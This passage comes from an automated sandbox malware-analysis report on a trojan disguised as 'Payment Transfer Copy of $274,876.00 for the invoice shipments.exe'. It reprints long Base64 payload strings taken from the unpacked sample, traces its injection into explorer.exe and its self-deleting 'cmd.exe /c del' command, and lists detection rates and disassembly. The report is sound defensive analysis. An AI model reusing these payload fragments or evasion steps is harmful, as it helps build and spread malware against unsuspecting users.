fNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.csBase64 encoded string: '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
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@9/9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1636:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeVirustotal: Detection: 25%
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
          Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_004178B3 push edi; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419AD3 push edx; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00416A8A pushfd ; retf
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409B8D pushfd ; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00417B8E push edi; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409B8D pushfd ; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00404443 push 0000007Bh; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040E42C push ss; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419DB2 push es; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041667E push edx; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0103D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03099B8D pushfd ; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A7B8E push edi; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A6A8A pushfd ; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9AD3 push edx; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A78B3 push edi; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF0B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF02 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF6C push eax; ret
